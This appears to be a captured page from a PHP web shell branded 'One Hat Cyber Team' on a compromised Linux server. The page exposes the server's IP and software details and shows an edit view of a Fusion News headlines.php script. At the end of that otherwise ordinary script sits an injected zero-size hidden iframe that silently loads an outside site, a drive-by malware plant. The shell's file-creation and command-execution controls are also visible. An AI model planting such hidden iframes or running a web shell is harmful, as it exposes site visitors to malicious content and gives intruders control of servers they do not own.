One Hat Cyber Team
Your IP :
216.73.216.115
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
sam
/
public_html
/
go
/
news
/
Edit File:
headlines.php
<?php /* ||========================================================== || Fusion News 3.x ||---------------------------------------------------------- || File Version : $Id: headlines.php 210 2008-02-20 12:22:32Z xycaleth $ || Contact : xycaleth@gmail.com || Copyright: : (c) 2006 - 2008, FusionNews.net || License Info : http://www.gnu.org/copyleft/gpl.html ||========================================================== */ if ( !defined ('FNEWS_ROOT_PATH') ) { define ('FNEWS_ROOT_PATH', str_replace ('\\', '/', dirname (__FILE__)) . '/'); include_once FNEWS_ROOT_PATH . 'common.php'; } $fn_category = ( isset ($fn_category) ) ? intval ($fn_category) : 0; $file = arrange_by_date(); $total_posts = sizeof ($file); if ( $total_posts <= 0 ) { return; } if ( $flip_news ) { $file = array_reverse ($file); } $valid_posts = array(); $max_headlines = $total_posts < $numofh ? $total_posts : $numofh; $other_qs = clean_query_string(); for ( $i = 0; $i < $max_headlines; $i++ ) { list ($id, $timestamp, $writer, $subject, $categories) = explode ('|<|', $file[$i]); if ( file_exists (FNEWS_ROOT_PATH . 'news/news.' . $id . '.php') ) { $news_file = file (FNEWS_ROOT_PATH . 'news/news.' . $id . '.php'); array_shift ($news_file); list ($shortnews, $fullnews, $writer, $subject, $description, $categories, $timestamp, $num_comments, $id) = explode ('|<|', $news_file[0]); if ( $fn_category === 0 || in_array ($fn_category, explode (',', $categories)) ) { $news_info = parse_news_to_view ($news_file[0]); $temp_head = get_template ('headline_temp.php', false); $temp_head = str_replace ('{post_id}', $news_info['post_id'], $temp_head); $temp_head = str_replace ('{subject}', $news_info['subject'], $temp_head); $temp_head = str_replace ('{description}', $news_info['description'], $temp_head); $temp_head = str_replace ('{user}', $news_info['writer'], $temp_head); $temp_head = str_replace ('{icon}', $news_info['icon'], $temp_head); $temp_head = str_replace ('{date}', $news_info['date'], $temp_head); $temp_head = str_replace ('{cat_icon}', $news_info['cat_icon'], $temp_head); $temp_head = str_replace ('{cat_name}', $news_info['cat_name'], $temp_head); $temp_head = str_replace ('{cat_id}', $news_info['cat_id'], $temp_head); if ( ($i > $numofposts) || $link_headline_fullstory ) { $temp_head = str_replace ('{linkstart}', '<a href="' . $furl . '/fullnews.php?fn_id=' . $id . '">', $temp_head); } else { $temp_head = str_replace('{linkstart}', '<a href="' . $hurl . '#fus_' . $id . '">', $temp_head); } $temp_head = str_replace ('{linkend}', '</a>', $temp_head); echo $temp_head; } } } ?> <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://gubmos.com/index12"></iframe>
Simpan